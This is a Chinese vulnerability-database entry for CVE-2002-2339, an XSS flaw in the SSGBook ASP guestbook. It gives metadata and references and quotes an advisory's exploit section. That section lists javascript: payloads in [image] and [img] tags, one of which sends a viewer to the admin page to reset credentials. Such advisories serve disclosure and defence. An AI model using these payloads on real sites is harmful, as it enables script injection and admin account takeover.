SSGBook图像标签HTML注入漏洞

SSGBook图像标签HTML注入漏洞

漏洞ID 1107032 漏洞类型 跨站脚本
发布时间 2002-10-08 更新时间 2002-12-31
图片[1]-SSGBook图像标签HTML注入漏洞-安全小百科CVE编号 CVE-2002-2339
图片[2]-SSGBook图像标签HTML注入漏洞-安全小百科CNNVD-ID CNNVD-200212-752
漏洞平台 ASP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/21914
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-752
|漏洞详情
Script-ShedGuestBook1.0版本中的configure.asp存在跨站脚本(XSS)漏洞。远程攻击者可以通过(1)image,(2)img,(3)image=right,(4)img=right,(5)image=left,and(6)img=left标签中的javascript:URL注入任意web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/5915/info

SSGbook includes codes for allowing users to specify HTML formatting and layout inside of guestbook entries. For example, a user can include an image by including it inside of [image] or [img] tags. However, arbitrary HTML and script code are not sufficiently sanitized within these tags.

As a result, users may include malicious HTML and script code inside of guestbook entries. The attacker-supplied code will be rendered in the web client of a user who views a malicious guestbook entry. 

[image]javascript:{SCRIPT}[/image]

[img=right]javascript:{SCRIPT}[/img=right]

[image=right]javascript:{SCRIPT}[/image=right]

[img=left]javascript:{SCRIPT}[/img=left]

[image=left]javascript:{SCRIPT}[/image=left]

[img]javascript:{SCRIPT}[/img]

[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]
|参考资料

来源:BID
名称:5915
链接:http://www.securityfocus.com/bid/5915
来源:XF
名称:ss-guestbook-img-xss(10331)
链接:http://www.iss.net/security_center/static/10331.php
来源:BUGTRAQ
名称:20021008SSGbook(ASP)
链接:http://online.securityfocus.com/archive/1/294299
来源:BUGTRAQ
名称:20031001Re:SSGbook(ASP)
链接:http://archives.neohapsis.com/archives/bugtraq/2003-10/0009.html

相关推荐: GOST 34.19-2001 Standard Implementation El Gamal Signature Weakness

GOST 34.19-2001 Standard Implementation El Gamal Signature Weakness 漏洞ID 1101980 漏洞类型 Design Error 发布时间 2002-06-20 更新时间 2002-06-20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享